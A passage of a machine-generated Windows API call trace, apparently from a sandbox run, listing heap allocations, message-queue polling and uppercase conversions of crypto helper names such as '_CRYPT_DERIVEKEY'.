lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0150.930] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0150.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0150.930] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0150.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fed8 [0150.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0150.930] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0150.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fed8 | out: hHeap=0x970000) returned 1 [0150.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0150.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50860 [0150.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0150.930] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0150.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0150.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0150.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0150.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0150.931] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0150.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0150.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0150.931] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0150.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0150.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0150.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0150.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0150.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0150.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0150.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0150.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0150.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0150.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0150.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0150.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0150.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0150.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0150.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0150.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0150.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0150.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0150.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0150.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0150.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0150.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0150.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0150.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0150.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0150.932] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0150.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0150.932] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0150.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0150.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0150.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0150.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0150.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0150.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0150.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0150.932] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0150.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0150.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fe68 [0150.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0150.932] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0150.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fe68 | out: hHeap=0x970000) returned 1 [0150.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0150.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0150.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54d08 [0150.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0150.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0150.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0150.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0150.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0150.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b28 [0150.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0150.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0150.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0150.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50608 [0150.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0150.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0150.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0150.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0150.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0150.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0150.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0150.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0150.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0150.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0150.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0150.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0150.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50950 [0150.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0150.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50788 [0150.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0150.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0150.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0150.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0150.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b38 [0150.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0150.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0150.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0150.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0150.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0150.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0150.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0150.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0150.934] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0150.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0150.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0150.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0150.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0150.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0150.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0150.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0150.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0150.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0150.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0150.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0150.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0150.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0150.934] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0150.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0150.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0150.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0150.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0150.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0150.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0150.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0150.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0150.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0150.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0150.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0150.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0150.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0150.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0150.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0150.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0150.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0150.935] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0150.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0150.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0150.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0150.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0150.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0150.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0150.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0150.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0150.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0150.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0150.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0150.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0150.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0150.935] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0150.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0150.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0150.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0150.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0150.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0150.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0150.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0150.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0150.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0150.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0150.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0150.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0150.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0150.936] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0150.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0150.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0150.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0150.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0150.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0150.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0150.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0150.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0150.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0150.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0150.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0150.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0150.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0150.936] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0150.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0150.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0150.936] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0150.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0150.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0150.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50890 [0150.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0150.936] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0150.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0150.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fc70 [0150.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0150.936] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0150.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fc70 | out: hHeap=0x970000) returned 1 [0150.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0150.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50710 [0150.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0150.937] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0150.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0150.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0150.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0150.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0150.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0150.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0150.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0150.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0150.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0150.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0150.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0150.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0150.937] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0150.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0150.937] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0150.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80060 [0150.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0150.937] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0150.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80060 | out: hHeap=0x970000) returned 1 [0150.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0150.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50710 [0150.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0150.937] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0150.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0150.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0150.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0150.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0150.938] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0150.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0150.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0150.938] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0150.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0150.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0150.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0150.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0150.938] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0150.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0150.938] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0150.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0150.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0150.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0150.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0150.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80060 [0150.938] 